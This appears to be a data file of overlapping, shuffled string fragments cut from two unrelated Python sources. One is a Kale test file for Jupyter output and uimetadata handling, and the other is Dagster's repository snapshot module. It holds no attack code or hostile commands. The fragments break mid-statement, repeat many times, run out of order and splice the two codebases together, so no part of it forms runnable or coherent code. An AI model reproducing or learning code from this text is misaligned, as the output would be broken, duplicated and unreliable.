"update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has been updated correctly updated",
"= {\"outputs\": [{ 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated ==",
"# distributed under the License is distributed on an \"AS IS\" BASIS, #",
"is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF",
"--- (_output_display({'text/plain': \"bytes\"}), ju.text_html_template.format(\"bytes\")), # --- (_output_display({'application/javascript': \"bytes\"}), ju.javascript_html_template.format(\"bytes\")), ]) def test_generate_html_output(outputs, target):",
"pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') # update tmp",
"kale.utils import jupyter_utils as ju def _output_display(data): # `data` must be a list",
"def _output_display(data): # `data` must be a list return [{'output_type': 'display_data', 'data': data}]",
"# create base tmp file markdown = { 'type': 'markdown', 'storage': 'inline', 'source':",
"import pytest from testfixtures import mock from kale.utils import jupyter_utils as ju def",
"base tmp file markdown = { 'type': 'markdown', 'storage': 'inline', 'source': '#Some markdown'",
"testfixtures import mock from kale.utils import jupyter_utils as ju def _output_display(data): # `data`",
"= 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file markdown = {",
"= {\"outputs\": [markdown, { 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated",
"assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file",
"updated correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [markdown, { 'type': 'web-app', 'storage':",
"def test_update_uimetadata_from_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value",
"target == ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils, tmpdir): \"\"\"Test the uimetadata file is created",
"with the License. # You may obtain a copy of the License at",
"# create base tmp file base = {\"outputs\": []} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json')",
"def test_generate_html_output(outputs, target): \"\"\"Tests html artifact generation from cell outputs.\"\"\" assert target ==",
"# # Licensed under the Apache License, Version 2.0 (the \"License\"); # you",
"# --- (_output_display({'image/png': \"bytes\"}), ju.image_html_template.format(\"\", \"bytes\")), # --- (_output_display({'text/html': \"bytes\"}), \"bytes\"), # ---",
"uimetadata file is updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value",
"'w')) # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has been updated",
"'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x:",
"ju.image_html_template.format(\"\", \"bytes\")), # --- (_output_display({'text/html': \"bytes\"}), \"bytes\"), # --- (_output_display({'text/plain': \"bytes\"}), ju.text_html_template.format(\"bytes\")), #",
"law or agreed to in writing, software # distributed under the License is",
"html artifact generation from cell outputs.\"\"\" assert target == ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils,",
"the License for the specific language governing permissions and # limitations under the",
"]) def test_generate_html_output(outputs, target): \"\"\"Tests html artifact generation from cell outputs.\"\"\" assert target",
"'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file base = {\"outputs\": []}",
"uimetadata_path=filepath) # check file has been updated correctly updated = json.loads(open(filepath).read()) target =",
"Authors # # Licensed under the Apache License, Version 2.0 (the \"License\"); #",
"file has been updated correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [{ 'type':",
"on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,",
"language governing permissions and # limitations under the License. import os import json",
"'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x)",
"\"bytes\"}), ju.text_html_template.format(\"bytes\")), # --- (_output_display({'application/javascript': \"bytes\"}), ju.javascript_html_template.format(\"bytes\")), ]) def test_generate_html_output(outputs, target): \"\"\"Tests html",
"json.dump(base, open(filepath, 'w')) # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has",
"from kale.utils import jupyter_utils as ju def _output_display(data): # `data` must be a",
"test standard code code = (\"a = 3\\nprint(a)\", ) ju.run_code(code) # test magic",
"base tmp file base = {\"outputs\": []} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath,",
"tmp file base = {\"outputs\": []} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w'))",
"cell outputs.\"\"\" assert target == ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils, tmpdir): \"\"\"Test the uimetadata",
"'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils, tmpdir): \"\"\"Test that",
"'test_wk' # create base tmp file markdown = { 'type': 'markdown', 'storage': 'inline',",
"in compliance with the License. # You may obtain a copy of the",
"{ 'type': 'markdown', 'storage': 'inline', 'source': '#Some markdown' } base = {\"outputs\": [markdown]}",
"License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or",
"created when it does not exists.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value",
"'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file base",
"# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #",
"= 3\\nprint(a)\", ) ju.run_code(code) # test magic command code = (\"%%time\\nprint('Some dull code')\",",
"at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed",
"file base = {\"outputs\": []} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) #",
"See the License for the specific language governing permissions and # limitations under",
"BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.",
"} base = {\"outputs\": [markdown]} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) #",
"a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required",
"\"\"\"Test that the uimetadata file is updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value",
"# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in",
"updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is",
"License. import os import json import pytest from testfixtures import mock from kale.utils",
"@mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils, tmpdir): \"\"\"Test the uimetadata file is created when it does",
"file is updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value =",
"(_output_display({'image/png': \"bytes\"}), ju.image_html_template.format(\"\", \"bytes\")), # --- (_output_display({'text/html': \"bytes\"}), \"bytes\"), # --- (_output_display({'text/plain': \"bytes\"}),",
"'test_wk' # create base tmp file base = {\"outputs\": []} filepath = os.path.join(tmpdir,",
"file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has been updated correctly updated = json.loads(open(filepath).read())",
"_output_display(data): # `data` must be a list return [{'output_type': 'display_data', 'data': data}] @pytest.mark.parametrize(\"outputs,target\",",
"@pytest.mark.parametrize(\"outputs,target\", [ ([], \"\"), # --- (_output_display({'image/png': \"bytes\"}), ju.image_html_template.format(\"\", \"bytes\")), # --- (_output_display({'text/html':",
"# test standard code code = (\"a = 3\\nprint(a)\", ) ju.run_code(code) # test",
"Version 2.0 (the \"License\"); # you may not use this file except in",
"except in compliance with the License. # You may obtain a copy of",
"must be a list return [{'output_type': 'display_data', 'data': data}] @pytest.mark.parametrize(\"outputs,target\", [ ([], \"\"),",
"def test_update_uimetadata_not_exists(pod_utils, tmpdir): \"\"\"Test the uimetadata file is created when it does not",
"target): \"\"\"Tests html artifact generation from cell outputs.\"\"\" assert target == ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils')",
"'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file markdown = { 'type':",
"{\"outputs\": []} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update tmp file",
"# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0",
"may not use this file except in compliance with the License. # You",
"License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS",
"it does not exists.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk'",
"def test_update_uimetadata_from_not_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value",
"'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils, tmpdir): \"\"\"Test that",
"== target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is updated",
"as ju def _output_display(data): # `data` must be a list return [{'output_type': 'display_data',",
"create base tmp file base = {\"outputs\": []} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base,",
"\"bytes\"}), \"bytes\"), # --- (_output_display({'text/plain': \"bytes\"}), ju.text_html_template.format(\"bytes\")), # --- (_output_display({'application/javascript': \"bytes\"}), ju.javascript_html_template.format(\"bytes\")), ])",
"os.path.join(tmpdir, 'tmp_uimetadata.json') # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has been",
"assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file",
"test_run_code(): \"\"\"Test that Python code runs inside a jupyter kernel successfully.\"\"\" # test",
"permissions and # limitations under the License. import os import json import pytest",
"distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT",
") ju.run_code(code) # test magic command code = (\"%%time\\nprint('Some dull code')\", ) ju.run_code(code)",
"[markdown]} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update tmp file ju.update_uimetadata('test',",
"'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils,",
"[ ([], \"\"), # --- (_output_display({'image/png': \"bytes\"}), ju.image_html_template.format(\"\", \"bytes\")), # --- (_output_display({'text/html': \"bytes\"}),",
"= json.loads(open(filepath).read()) target = {\"outputs\": [markdown, { 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz'",
"3\\nprint(a)\", ) ju.run_code(code) # test magic command code = (\"%%time\\nprint('Some dull code')\", )"
]
[
"__new__(cls, name, pipeline_snapshots): return super(RepositorySnapshot, cls).__new__( cls, name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot",
"repository_snapshot.pipeline_snapshots ) def get_pipeline_index(self, pipeline_name): return self._pipeline_index_map[pipeline_name] def has_pipeline_index(self, pipeline_name): return pipeline_name in",
"self._pipeline_index_map[pipeline_name] def has_pipeline_index(self, pipeline_name): return pipeline_name in self._pipeline_index_map def get_pipeline_indices(self): return self._pipeline_index_map.values() @staticmethod",
"def from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition) return RepositorySnapshot( name=repository_definition.name, pipeline_snapshots=[ PipelineSnapshot.from_pipeline_def(pipeline_definition) for pipeline_definition in",
"'name'), pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot ), ) def has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for",
"get_pipeline_indices(self): return self._pipeline_index_map.values() @staticmethod def from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')):",
"return pipeline check.failed('pipeline not found') def get_all_pipeline_snapshots(self): return self.pipeline_snapshots @staticmethod def from_repository_definition(repository_definition): check.inst_param(repository_definition,",
"'name pipeline_snapshots')): def __new__(cls, name, pipeline_snapshots): return super(RepositorySnapshot, cls).__new__( cls, name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param(",
"pipeline_snapshot in repository_snapshot.pipeline_snapshots ) def get_pipeline_index(self, pipeline_name): return self._pipeline_index_map[pipeline_name] def has_pipeline_index(self, pipeline_name): return",
"def has_pipeline_index(self, pipeline_name): return pipeline_name in self._pipeline_index_map def get_pipeline_indices(self): return self._pipeline_index_map.values() @staticmethod def",
"if pipeline.name == pipeline_name: return pipeline check.failed('pipeline not found') def get_all_pipeline_snapshots(self): return self.pipeline_snapshots",
"'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return True return False",
"pipeline_name): return self._pipeline_index_map[pipeline_name] def has_pipeline_index(self, pipeline_name): return pipeline_name in self._pipeline_index_map def get_pipeline_indices(self): return",
"self.pipeline_snapshots: if pipeline.name == pipeline_name: return True return False def get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name,",
"def get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name:",
"name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot ), ) def has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name')",
"pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return pipeline",
"'repository_snapshot', RepositorySnapshot ) self._pipeline_index_map = OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for pipeline_snapshot in repository_snapshot.pipeline_snapshots )",
"dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot from dagster.serdes import whitelist_for_serdes class RepositoryIndex: def __init__(self, repository_snapshot):",
"in repository_snapshot.pipeline_snapshots ) def get_pipeline_index(self, pipeline_name): return self._pipeline_index_map[pipeline_name] def has_pipeline_index(self, pipeline_name): return pipeline_name",
"pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return True return False def get_pipeline_snapshot(self,",
"check from dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot from dagster.serdes import whitelist_for_serdes class RepositoryIndex: def",
"self._pipeline_index_map = OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for pipeline_snapshot in repository_snapshot.pipeline_snapshots ) def get_pipeline_index(self, pipeline_name):",
"in self.pipeline_snapshots: if pipeline.name == pipeline_name: return True return False def get_pipeline_snapshot(self, pipeline_name):",
"def get_all_pipeline_snapshots(self): return self.pipeline_snapshots @staticmethod def from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition) return RepositorySnapshot( name=repository_definition.name,",
"pipeline check.failed('pipeline not found') def get_all_pipeline_snapshots(self): return self.pipeline_snapshots @staticmethod def from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition',",
"'pipeline_snapshots', of_type=PipelineSnapshot ), ) def has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots:",
"get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return",
"= check.inst_param( repository_snapshot, 'repository_snapshot', RepositorySnapshot ) self._pipeline_index_map = OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for pipeline_snapshot",
"def get_pipeline_index(self, pipeline_name): return self._pipeline_index_map[pipeline_name] def has_pipeline_index(self, pipeline_name): return pipeline_name in self._pipeline_index_map def",
"return self._pipeline_index_map.values() @staticmethod def from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')): def",
"def from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')): def __new__(cls, name, pipeline_snapshots):",
"self._pipeline_index_map.values() @staticmethod def from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')): def __new__(cls,",
"pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return True",
"of_type=PipelineSnapshot ), ) def has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if",
"not found') def get_all_pipeline_snapshots(self): return self.pipeline_snapshots @staticmethod def from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition) return",
"found') def get_all_pipeline_snapshots(self): return self.pipeline_snapshots @staticmethod def from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition) return RepositorySnapshot(",
"import whitelist_for_serdes class RepositoryIndex: def __init__(self, repository_snapshot): self.repository_snapshot = check.inst_param( repository_snapshot, 'repository_snapshot', RepositorySnapshot",
"for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return True return False def",
"PipelineIndex(pipeline_snapshot)) for pipeline_snapshot in repository_snapshot.pipeline_snapshots ) def get_pipeline_index(self, pipeline_name): return self._pipeline_index_map[pipeline_name] def has_pipeline_index(self,",
"if pipeline.name == pipeline_name: return True return False def get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name')",
"pipeline.name == pipeline_name: return pipeline check.failed('pipeline not found') def get_all_pipeline_snapshots(self): return self.pipeline_snapshots @staticmethod",
"True return False def get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if",
"from collections import OrderedDict, namedtuple from dagster import RepositoryDefinition, check from dagster.core.snap.pipeline_snapshot import",
"for pipeline_snapshot in repository_snapshot.pipeline_snapshots ) def get_pipeline_index(self, pipeline_name): return self._pipeline_index_map[pipeline_name] def has_pipeline_index(self, pipeline_name):",
"from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')): def __new__(cls, name, pipeline_snapshots): return",
"RepositoryIndex: def __init__(self, repository_snapshot): self.repository_snapshot = check.inst_param( repository_snapshot, 'repository_snapshot', RepositorySnapshot ) self._pipeline_index_map =",
"name, pipeline_snapshots): return super(RepositorySnapshot, cls).__new__( cls, name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot ),",
"get_pipeline_index(self, pipeline_name): return self._pipeline_index_map[pipeline_name] def has_pipeline_index(self, pipeline_name): return pipeline_name in self._pipeline_index_map def get_pipeline_indices(self):",
") def get_pipeline_index(self, pipeline_name): return self._pipeline_index_map[pipeline_name] def has_pipeline_index(self, pipeline_name): return pipeline_name in self._pipeline_index_map",
"pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot ), ) def has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in",
"def __init__(self, repository_snapshot): self.repository_snapshot = check.inst_param( repository_snapshot, 'repository_snapshot', RepositorySnapshot ) self._pipeline_index_map = OrderedDict(",
"RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')): def __new__(cls, name, pipeline_snapshots): return super(RepositorySnapshot, cls).__new__( cls, name=check.str_param(name, 'name'),",
"return super(RepositorySnapshot, cls).__new__( cls, name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot ), ) def",
"return pipeline_name in self._pipeline_index_map def get_pipeline_indices(self): return self._pipeline_index_map.values() @staticmethod def from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition))",
"return self._pipeline_index_map[pipeline_name] def has_pipeline_index(self, pipeline_name): return pipeline_name in self._pipeline_index_map def get_pipeline_indices(self): return self._pipeline_index_map.values()",
"pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot ), ) def has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline",
"RepositoryDefinition, check from dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot from dagster.serdes import whitelist_for_serdes class RepositoryIndex:",
"super(RepositorySnapshot, cls).__new__( cls, name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot ), ) def has_pipeline_snapshot(self,",
"has_pipeline_index(self, pipeline_name): return pipeline_name in self._pipeline_index_map def get_pipeline_indices(self): return self._pipeline_index_map.values() @staticmethod def from_repository_def(repository_definition):",
"pipeline_snapshots): return super(RepositorySnapshot, cls).__new__( cls, name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot ), )",
"has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return",
"self.repository_snapshot = check.inst_param( repository_snapshot, 'repository_snapshot', RepositorySnapshot ) self._pipeline_index_map = OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for",
"from dagster.serdes import whitelist_for_serdes class RepositoryIndex: def __init__(self, repository_snapshot): self.repository_snapshot = check.inst_param( repository_snapshot,",
"return True return False def get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots:",
"pipeline_snapshots')): def __new__(cls, name, pipeline_snapshots): return super(RepositorySnapshot, cls).__new__( cls, name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param( pipeline_snapshots,",
"== pipeline_name: return True return False def get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline",
"cls, name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot ), ) def has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name,",
"pipeline_name: return True return False def get_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in",
"check.failed('pipeline not found') def get_all_pipeline_snapshots(self): return self.pipeline_snapshots @staticmethod def from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition)",
"return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')): def __new__(cls, name, pipeline_snapshots): return super(RepositorySnapshot,",
"check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return pipeline check.failed('pipeline",
"@staticmethod def from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition) return RepositorySnapshot( name=repository_definition.name, pipeline_snapshots=[ PipelineSnapshot.from_pipeline_def(pipeline_definition) for pipeline_definition",
"dagster import RepositoryDefinition, check from dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot from dagster.serdes import whitelist_for_serdes",
") def has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name ==",
"import PipelineIndex, PipelineSnapshot from dagster.serdes import whitelist_for_serdes class RepositoryIndex: def __init__(self, repository_snapshot): self.repository_snapshot",
"class RepositoryIndex: def __init__(self, repository_snapshot): self.repository_snapshot = check.inst_param( repository_snapshot, 'repository_snapshot', RepositorySnapshot ) self._pipeline_index_map",
"), ) def has_pipeline_snapshot(self, pipeline_name): check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name",
"pipeline_name in self._pipeline_index_map def get_pipeline_indices(self): return self._pipeline_index_map.values() @staticmethod def from_repository_def(repository_definition): return RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes",
"__init__(self, repository_snapshot): self.repository_snapshot = check.inst_param( repository_snapshot, 'repository_snapshot', RepositorySnapshot ) self._pipeline_index_map = OrderedDict( (pipeline_snapshot.name,",
"RepositoryIndex(RepositorySnapshot.from_repository_definition(repository_definition)) @whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')): def __new__(cls, name, pipeline_snapshots): return super(RepositorySnapshot, cls).__new__(",
"OrderedDict, namedtuple from dagster import RepositoryDefinition, check from dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot from",
"check.inst_param( repository_snapshot, 'repository_snapshot', RepositorySnapshot ) self._pipeline_index_map = OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for pipeline_snapshot in",
"check.str_param(pipeline_name, 'pipeline_name') for pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return True return",
"pipeline_name: return pipeline check.failed('pipeline not found') def get_all_pipeline_snapshots(self): return self.pipeline_snapshots @staticmethod def from_repository_definition(repository_definition):",
"return self.pipeline_snapshots @staticmethod def from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition) return RepositorySnapshot( name=repository_definition.name, pipeline_snapshots=[ PipelineSnapshot.from_pipeline_def(pipeline_definition)",
"self.pipeline_snapshots: if pipeline.name == pipeline_name: return pipeline check.failed('pipeline not found') def get_all_pipeline_snapshots(self): return",
"pipeline_name): return pipeline_name in self._pipeline_index_map def get_pipeline_indices(self): return self._pipeline_index_map.values() @staticmethod def from_repository_def(repository_definition): return",
"@whitelist_for_serdes class RepositorySnapshot(namedtuple('_RepositorySnapshot', 'name pipeline_snapshots')): def __new__(cls, name, pipeline_snapshots): return super(RepositorySnapshot, cls).__new__( cls,",
"from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition) return RepositorySnapshot( name=repository_definition.name, pipeline_snapshots=[ PipelineSnapshot.from_pipeline_def(pipeline_definition) for pipeline_definition in repository_definition.get_all_pipelines()",
"get_all_pipeline_snapshots(self): return self.pipeline_snapshots @staticmethod def from_repository_definition(repository_definition): check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition) return RepositorySnapshot( name=repository_definition.name, pipeline_snapshots=[",
"whitelist_for_serdes class RepositoryIndex: def __init__(self, repository_snapshot): self.repository_snapshot = check.inst_param( repository_snapshot, 'repository_snapshot', RepositorySnapshot )",
"cls).__new__( cls, name=check.str_param(name, 'name'), pipeline_snapshots=check.list_param( pipeline_snapshots, 'pipeline_snapshots', of_type=PipelineSnapshot ), ) def has_pipeline_snapshot(self, pipeline_name):",
"'repository_definition', RepositoryDefinition) return RepositorySnapshot( name=repository_definition.name, pipeline_snapshots=[ PipelineSnapshot.from_pipeline_def(pipeline_definition) for pipeline_definition in repository_definition.get_all_pipelines() ], )",
"<filename>python_modules/dagster/dagster/core/snap/repository_snapshot.py from collections import OrderedDict, namedtuple from dagster import RepositoryDefinition, check from dagster.core.snap.pipeline_snapshot",
"collections import OrderedDict, namedtuple from dagster import RepositoryDefinition, check from dagster.core.snap.pipeline_snapshot import PipelineIndex,",
"OrderedDict( (pipeline_snapshot.name, PipelineIndex(pipeline_snapshot)) for pipeline_snapshot in repository_snapshot.pipeline_snapshots ) def get_pipeline_index(self, pipeline_name): return self._pipeline_index_map[pipeline_name]",
"== pipeline_name: return pipeline check.failed('pipeline not found') def get_all_pipeline_snapshots(self): return self.pipeline_snapshots @staticmethod def",
"pipeline in self.pipeline_snapshots: if pipeline.name == pipeline_name: return pipeline check.failed('pipeline not found') def",
"from dagster.core.snap.pipeline_snapshot import PipelineIndex, PipelineSnapshot from dagster.serdes import whitelist_for_serdes class RepositoryIndex: def __init__(self,",
"check.inst_param(repository_definition, 'repository_definition', RepositoryDefinition) return RepositorySnapshot( name=repository_definition.name, pipeline_snapshots=[ PipelineSnapshot.from_pipeline_def(pipeline_definition) for pipeline_definition in repository_definition.get_all_pipelines() ],",
